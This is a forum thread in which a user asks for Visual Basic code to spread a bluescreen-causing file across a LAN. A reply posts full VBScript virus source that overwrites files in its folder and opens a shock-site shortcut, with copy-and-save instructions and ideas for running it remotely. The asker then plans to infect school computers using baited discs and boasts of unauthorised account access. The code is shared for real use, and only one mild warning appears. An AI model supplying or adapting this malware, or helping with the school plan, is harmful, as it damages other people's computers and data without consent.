Spread through LAN "VB"

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Spread through LAN "VB"

Post by ayu »

I was just wondering if you had a Visual Basic code so that when i click my "file" the file spreads and executes through the LAN i am sitting at.

(going to a LAN on sunday :P )

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Post by CommonStray »

could you explain a bit more?

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Post by ayu »

i would love to :P

My project for the LAN tomorrow (local area network for those who doesnt know) is that im going to make a file wich takes the computer to bleuscreen (already done the bleuscreen). But i have a problem with the file spreading through the LAN. As in when i click the file on my computer and i get the bluescreen, i want the file to then send itself to the other computers in the same network and give them bluescreen aswell.

You see where im going with this? :P

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Post by ayu »

*Throwes in a rock and BUMP*

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Post by CommonStray »

in order for your file to spread thorugh the LAN party the people on the LAN will have to accept it, im not sure if there is a way to flood/force the file onto the other machines but take a look at this

'Made By: sick66
'On 14-8-00
'With Notepad
'By sick66 (uv course an alias)
'Do NOT edit above this line!!!
Dim pentagram, WshShell, FSO, VX, VirusLink
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Wscript.CreateObject("Wscript.Shell")
pentagram = Wscript.ScriptFullName
VX = Left(pentagram, InStrRev(pentagram, "\"))
For Each target in FSO.GetFolder(VX).Files
FSO.CopyFile pentagram, target.Name, 1
If Int((2 * Rnd) + 1) = 1 Then
MsgBox "HAIL TEXTFILES.COM", 4096 , "VBS.=)"
Set VirusLink = WshShell.CreateShortcut("C:\WINDOWS\Favorites\pentagram.URL")
VirusLink.TargetPath = "http://vagina.rotten.com/fidel/"
WshShell.Run ("C:\WINDOWS\Favorites\pentagram.URL")
End If

xxxxxxxxxxxxxxxxx CUT HERE xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

follow these steps:

- right click with mouse on desktop
- select 'new'
- there you will see a list of files you can create, pick 'textfile'
- name it kewl, funny or something
- select al the code that's between the two 'cut here' lines
so that it becomes blue or black
(do NOT select the 'cut here' lines)
- once selected press ctrl+c (control+c)
or go to 'edit' and select 'copy'
- now open the new created textfile and press ctrl+v (control+v)
or go to 'edit' and select 'paste'
- the code will now appear on the screen.
to make the virus work, go to 'file' and select 'save as'
give it any name, but make sure that it ends in '.vbs'
if you want to name it funny for instance, type 'funny.vbs'
in the window where you have to specify the filename

this VBScript, runs similair to the I Love you Virus (if you remember the hype about it a while back) this is the 'malkavian' virus by -KD- which i found at www.textfiles.com

also you could likely write a simple batch file that would run the virus remotely from your computer as long as file and printer sharing is enabled on the LAN (or even write a small vb app that seems useful, but calls the virus remotely), you can check out my DOS tutorials in the General Computing section

hope this helps (sorry for the wait)

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Post by ayu »

Damn i would like to kiss you ^^

Could you explain some more?

VirusLink.TargetPath = "http://vagina.rotten.com/fidel/"

what does this do? does it go to a site? or does it save to it? describe please ^^

WshShell.Run ("C:\WINDOWS\Favorites\pentagram.URL")

and this? Opens the URL that was saved in Viruslink.targetpath??

Becouse this would be great...becouse i could use this to bring up a Bluescreen through the IE exploit = /

I have a new target...that got damn school! >_<

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Post by Stavros »

Hacking a shchool server is not worth getting expelled or suspended.

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Post by ayu »

Stavros wrote:Hacking a shchool server is not worth getting expelled or suspended.

Not if you get caught indeed.. But i wont, i have it all planned already.

They will never know....just becouse im bored i will tell you my plan.

Theres 2500 idiotic zombies wandering arround that school....if they see anything with the name "test answers" or "porno" they will take it and run to a school computer. All i need todo is make som discs with some names...and place them arround the school when no1 is there...3000 students so i will do it just b4 they close the school

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Post by Stavros »

Does your school have a network admin that know's what they're doing or are they like my school: They think a firewall will be fine and don't realize how vulnerable the network is. If it's the first (and I doubt it) don't get too cocky.

I'm dismayed by the shittyness of my school. They think that they're safe behind a firewall. I ask them a remotely technical question and I get the "Uh...I don't know" response and I think, "Jesus, I'm being 'taught' by baboons."[/rant]

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Post by ayu »

Stavros wrote:Does your school have a network admin that know's what they're doing or are they like my school: They think a firewall will be fine and don't realize how vulnerable the network is. If it's the first (and I doubt it) don't get too cocky.

I'm dismayed by the shittyness of my school. They think that they're safe behind a firewall. I ask them a remotely technical question and I get the "Uh...I don't know" response and I think, "Jesus, I'm being 'taught' by baboons."[/rant]

The Admin(s) on my school think that they know anything....they bann people from the network when playing games on the internet...and they tell us there is no way to get pass those blocked sites....

when i ask them a question they say that they are busy and tells me to go to another admin (wich in this case was even dumber)

i noticed that the school has some net and IE problems becouse it is not uppdated...also the AV isnt uppdated...i tried the "happy 99" virus just to check..and the AV didnt respond.....i have goten into other peoples accounts on the school by just replacing their school id in the drives list....nothing happend...no Admin came yelling.....they only do when someone tries to play a game like Quake or go into a porno site.

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Post by ayu »

Something tells me that this code is to old or just doesnt work...becouse it doesnt drop copies in the network...and it doesnt goto the URL that it says todo in the code...also it doesnt even make the URL favorite copy.

Is there anyone that knows of a code that might work?

CircuitB0mB wrote:in order for your file to spread thorugh the LAN party the people on the LAN will have to accept it, im not sure if there is a way to flood/force the file onto the other machines but take a look at this

'Made By: sick66
'On 14-8-00
'With Notepad
'By sick66 (uv course an alias)
'Do NOT edit above this line!!!
Dim pentagram, WshShell, FSO, VX, VirusLink
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Wscript.CreateObject("Wscript.Shell")
pentagram = Wscript.ScriptFullName
VX = Left(pentagram, InStrRev(pentagram, ""))
For Each target in FSO.GetFolder(VX).Files
FSO.CopyFile pentagram, target.Name, 1
If Int((2 * Rnd) + 1) = 1 Then
MsgBox "HAIL TEXTFILES.COM", 4096 , "VBS.=)"
Set VirusLink = WshShell.CreateShortcut("C:\WINDOWS\Favorites\pentagram.URL")
VirusLink.TargetPath = "http://vagina.rotten.com/fidel/"
WshShell.Run ("C:\WINDOWS\Favorites\pentagram.URL")
End If

xxxxxxxxxxxxxxxxx CUT HERE xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

follow these steps:

- right click with mouse on desktop
- select 'new'
- there you will see a list of files you can create, pick 'textfile'
- name it kewl, funny or something
- select al the code that's between the two 'cut here' lines
so that it becomes blue or black
(do NOT select the 'cut here' lines)
- once selected press ctrl+c (control+c)
or go to 'edit' and select 'copy'
- now open the new created textfile and press ctrl+v (control+v)
or go to 'edit' and select 'paste'
- the code will now appear on the screen.
to make the virus work, go to 'file' and select 'save as'
give it any name, but make sure that it ends in '.vbs'
if you want to name it funny for instance, type 'funny.vbs'
in the window where you have to specify the filename

this VBScript, runs similair to the I Love you Virus (if you remember the hype about it a while back) this is the 'malkavian' virus by -KD- which i found at www.textfiles.com

also you could likely write a simple batch file that would run the virus remotely from your computer as long as file and printer sharing is enabled on the LAN (or even write a small vb app that seems useful, but calls the virus remotely), you can check out my DOS tutorials in the General Computing section

hope this helps (sorry for the wait)

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